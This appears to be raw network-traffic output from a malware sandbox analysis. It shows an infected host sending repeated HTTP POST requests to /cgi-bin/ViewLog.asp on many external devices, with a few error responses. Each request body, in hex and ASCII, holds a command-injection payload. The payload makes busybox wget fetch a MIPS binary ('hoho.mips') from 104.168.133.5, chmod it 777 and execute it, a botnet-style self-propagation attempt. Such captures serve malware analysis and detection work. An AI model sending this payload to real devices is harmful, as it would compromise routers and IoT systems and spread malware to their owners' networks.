                                              Date: Thu, 23 Nov 2023 04:18:09 GMT
                                              Connection: close
                                              Content-Length: 311
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              709192.168.2.135903095.86.121.2278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.071357965 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              710192.168.2.134236295.86.127.2128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.071549892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              711192.168.2.135588895.164.45.1378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.295063972 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              712192.168.2.134537831.136.79.1288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.305803061 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.894175053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.046178102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.414170027 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.022253990 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              713192.168.2.133816494.110.82.28080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.319020033 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              714192.168.2.133648295.111.252.2288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.320812941 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              715192.168.2.133651894.111.12.2418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.342374086 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.022200108 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              716192.168.2.135351894.70.22.468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.361922979 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.624272108 CET522INHTTP/1.1 404 Not Found
                                              Server: mini_httpd/1.19 19dec2003
                                              Date: Thu, 23 Nov 2023 06:12:28 GMT
                                              Cache-Control: no-cache,no-store
                                              Content-Type: text/html; charset=%s
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              717192.168.2.135314485.69.37.1668080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.477011919 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.054184914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.174182892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.414175034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.022268057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              718192.168.2.134735085.93.191.2128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.526375055 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              719192.168.2.135226031.120.216.2358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.685508013 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.875809908 CET278INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              720192.168.2.135355631.136.242.358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.692864895 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.902174950 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
